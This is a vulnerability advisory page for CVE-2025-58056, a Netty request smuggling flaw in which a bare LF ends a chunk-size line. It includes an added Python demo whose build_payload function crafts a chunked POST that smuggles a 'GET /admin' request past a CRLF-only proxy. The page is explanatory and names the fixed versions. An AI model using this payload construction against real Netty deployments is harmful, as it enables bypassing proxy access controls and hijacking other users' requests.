CVE-2025-58056
Severity: HIGH
Netty < 4.1.125 - HTTP Request Smuggling via Inconsistent Chunked Transfer Encoding
Title source: llmDescription
Netty is an asynchronous event-driven network application framework for developing maintainable, high-performance protocol servers and clients. In version 4.1.124.Final and in versions 4.2.0.Alpha3 through 4.2.4.Final, Netty incorrectly accepts a standalone newline character (LF) as the terminator of a chunk-size line, whether or not a carriage return (CR) precedes it, instead of requiring CRLF as HTTP/1.1 (RFC 9112) does. When Netty sits behind a reverse proxy that parses a bare LF differently (treating it as part of the chunk extension, so the line only ends at the next CRLF), an attacker can craft a request that the proxy sees as one request but Netty processes as two, enabling request smuggling. Fixed in versions 4.1.125.Final and 4.2.5.Final.
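The parser differential described above, as an added example (this is not code from the page or from the Netty project, and it does not reproduce Netty's HttpObjectDecoder): a minimal HTTP/1.1 request splitter in Python that can be run in strict mode (a chunk-size line ends only at CRLF, which is the proxy behaviour in the description and also what the fixed versions enforce) or in lenient mode (a bare LF also ends the line, the affected behaviour). `build_payload` places a bare LF inside what the strict parser reads as the chunk extension and sizes the chunk so that the same bytes parse as a single POST for the strict parser and as a POST followed by `GET /admin` for the lenient one. The hostname, paths, filler byte and helper names are assumptions made for the demo.

```python
"""Added example for CVE-2025-58056: one byte stream, two chunk-size line
parsers. Strict = CRLF-only (proxy, and Netty >= 4.1.125.Final per the
advisory); lenient = also ends the line at a bare LF (affected Netty).
Host names, paths and helper names are assumptions, not Netty's code."""

CRLF = b"\r\n"


def read_line(buf: bytes, pos: int, lf_terminates: bool) -> tuple[bytes, int]:
    """Return (line, position after the terminator).

    Strict mode ends a line only at CRLF, so a bare LF is ordinary line content
    (the proxy treats it as part of the chunk extension). Lenient mode also ends
    the line at a bare LF, the pre-fix Netty behaviour.
    """
    if lf_terminates:
        end = buf.index(b"\n", pos)
        line = buf[pos:end]
        return (line[:-1] if line.endswith(b"\r") else line), end + 1
    end = buf.index(CRLF, pos)
    return buf[pos:end], end + 2


def chunk_size(line: bytes) -> int:
    """Hex size before the optional ';' chunk extension; extension bytes are ignored."""
    return int(line.split(b";", 1)[0].strip(), 16)


def parse_chunked_body(buf: bytes, pos: int, lenient_lf: bool) -> tuple[bytes, int]:
    body = bytearray()
    while True:
        line, pos = read_line(buf, pos, lenient_lf)  # the only line the bug affects
        size = chunk_size(line)
        if size == 0:
            break
        if pos + size + 2 > len(buf):
            raise ValueError("incomplete chunk")
        body += buf[pos:pos + size]
        pos += size
        if buf[pos:pos + 2] != CRLF:
            raise ValueError("chunk data must end with CRLF")
        pos += 2
    while True:  # trailer section ends at an empty line
        line, pos = read_line(buf, pos, False)
        if line == b"":
            break
    return bytes(body), pos


def parse_requests(buf: bytes, lenient_lf: bool):
    """Split a byte stream into (method, target, body) tuples; return (requests, leftover)."""
    requests, pos = [], 0
    while pos < len(buf):
        try:
            line, pos_after = read_line(buf, pos, False)
            method, target, _version = line.split(b" ", 2)
        except ValueError:
            break  # not a request line: stop and report the rest as leftover bytes
        pos = pos_after
        headers = {}
        while True:
            line, pos = read_line(buf, pos, False)
            if line == b"":
                break
            name, value = line.split(b":", 1)
            headers[name.strip().lower()] = value.strip()
        body = b""
        if headers.get(b"transfer-encoding", b"").lower() == b"chunked":
            body, pos = parse_chunked_body(buf, pos, lenient_lf)
        elif b"content-length" in headers:
            n = int(headers[b"content-length"])
            body, pos = buf[pos:pos + n], pos + n
        requests.append((method.decode(), target.decode(), body))
    return requests, buf[pos:]


def build_payload(smuggled: bytes) -> bytes:
    """Chunked POST whose chunk-size line is "<hex>;" + bare LF + filler + CRLF.

    Lenient: the line ends at the LF; the n data bytes are filler+CRLF, then the
    chunk's CRLF, then the 0-chunk, so the POST ends and `smuggled` is request #2.
    Strict: the line runs to the CRLF after the filler (LF and filler are the
    extension); its n data bytes are CRLF + "0\r\n\r\n" + smuggled, so the second
    request is swallowed into the body and only one request is seen.
    """
    n = 2 + 5 + len(smuggled)  # strict parser's chunk data length
    filler = b"A" * (n - 2)    # lenient parser's data = filler + CRLF, also n bytes
    head = b"POST / HTTP/1.1\r\nHost: backend\r\nTransfer-Encoding: chunked\r\n\r\n"
    return (head + b"%x;\n" % n + filler + CRLF
            + CRLF + b"0\r\n\r\n" + smuggled
            + CRLF + b"0\r\n\r\n")


SMUGGLED = b"GET /admin HTTP/1.1\r\nHost: backend\r\n\r\n"  # constructed sample
PAYLOAD = build_payload(SMUGGLED)


def proxy_view():
    """CRLF-only parser: one POST whose body contains the smuggled request."""
    return parse_requests(PAYLOAD, lenient_lf=False)


def netty_view():
    """Bare-LF-tolerant parser: a POST followed by GET /admin."""
    return parse_requests(PAYLOAD, lenient_lf=True)


if __name__ == "__main__":
    for label, (reqs, rest) in (("proxy", proxy_view()), ("netty", netty_view())):
        print(label, [(m, t, len(b)) for m, t, b in reqs], "leftover:", rest)
```

The strict side here ignores everything after `;` up to CRLF, which is the proxy behaviour the description assumes; a proxy that validated chunk-extension syntax would reject the bare LF instead, and then no desync occurs. The smuggled request is made complete so the demo shows two whole requests; in a real attack the attacker leaves it unterminated so its prefix merges with the next client's request. The practical check is the version: netty-codec-http 4.1.125.Final or 4.2.5.Final and later require CRLF.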
References (7)
https://github.com/netty/netty/security/advisories/GHSA-fghv-69vj-qj49 (Exploit, Vendor Advisory; x_refsource_confirm)
https://github.com/JLLeitschuh/unCVEed/issues/1 (Issue Tracking, Third Party Advisory; x_refsource_misc)
https://github.com/netty/netty/issues/15522 (Issue Tracking; x_refsource_misc)
https://github.com/netty/netty/pull/15611 (Issue Tracking, Patch; x_refsource_misc)
https://github.com/netty/netty/commit/edb55fd8e0a3bcbd85881e423464f585183d1284 (Patch; x_refsource_misc)
https://datatracker.ietf.org/doc/html/rfc9112#name-chunked-transfer-coding (Technical Description; x_refsource_misc)
https://w4ke.info/2025/06/18/funky-chunks.html (Broken Link; x_refsource_misc)
Scores
CVSS v3: 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N)
Attack Vector: NETWORK
EPSS: 0.0063 (percentile 45.3%)
CISA SSVC (Vulnrichment)
Exploitation: none
Automatable: no
Technical Impact: partial
Details
CWE: CWE-444 (Inconsistent Interpretation of HTTP Requests, 'HTTP Request/Response Smuggling')
Status: published
Products (2)
io.netty/netty-codec-http (Maven): 0 - 4.1.125.Final
netty/netty: < 4.1.125
Published: Sep 03, 2025
Tracked Since: Feb 18, 2026